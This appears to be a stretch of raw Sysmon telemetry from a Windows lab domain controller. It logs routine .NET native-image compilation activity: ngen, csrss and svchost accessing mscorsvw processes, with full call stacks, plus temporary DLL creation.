13:48:03.076{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C602-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.076{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C602-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:02.998{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:02.998{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:04.951{59A5CD1D-9194-6005-CD02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6dc-0\System.Web.Extensions.Design.dll2021-01-18 13:48:04.936 10341000x80000000000000007041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.420{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9194-6005-CD02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.404{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9194-6005-CD02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.404{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9194-6005-CD02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.295{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9194-6005-CC02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.264{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9194-6005-CC02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.264{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9194-6005-CC02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.123{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9194-6005-CB02-00000000A301}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.123{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9194-6005-CB02-00000000A301}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:04.123{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9194-6005-CB02-00000000A301}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:04.045{59A5CD1D-9193-6005-CA02-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12a0-0\System.Web.Entity.Design.dll2021-01-18 13:48:04.045 10341000x80000000000000007048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.186{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9195-6005-CF02-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.170{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9195-6005-CF02-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.170{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9195-6005-CF02-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9195-6005-CE02-00000000A301}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.014{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9195-6005-CE02-00000000A301}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:05.014{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9195-6005-CE02-00000000A301}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.826{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9196-6005-D102-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.811{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9196-6005-D102-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.811{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9196-6005-D102-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.779{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9196-6005-D002-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:06.779{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9196-6005-D002-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 